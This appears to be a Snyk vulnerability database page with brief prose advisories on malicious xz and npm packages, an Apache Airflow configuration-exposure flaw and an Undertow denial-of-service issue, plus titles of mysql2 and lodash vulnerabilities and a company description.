We’ve disclosed 3381 vulnerabilities
by Snyk Security
Researchers
How to fix?
Avoid using all malicious instances of the tukaani-project/xz
package.
@gusmano/reext is a malicious package. This package contains malicious code that steals sensitive information including operating system username, Git username, and Git email.
apache-airflow is a platform to programmatically author, schedule, and monitor workflows.
Affected versions of this package are vulnerable to Information Exposure via the configuration
UI page. An attacker can see sensitive provider configuration by setting webserver.expose_config
to non-sensitive-only
, even though the celery provider is the only community provider currently that has sensitive configurations.
Note:
This is only exploitable if webserver.expose_config
configuration is set to non-sensitive-only
.
io.undertow:undertow-core is a Java web server based on non-blocking IO.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured max-header-size
attribute in ajp-listener
, leading to the server closing the TCP connection without returning an AJP response.
Note:
This is only exploitable if the max-header-size
is set to 64 KB or less.
Arbitrary Code Injection in mysql2 (npm)
Prototype Pollution in lodash (npm)
Prototype Pollution in lodash.zipobjectdeep (npm)
Remote Code Execution (RCE) in mysql2 (npm)
Prototype Poisoning in mysql2 (npm)
by Snyk Security
Researchers
Snyk is a developer security platform. Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. Supported by industry-leading application and security intelligence, Snyk puts security expertise in any developer's toolkit.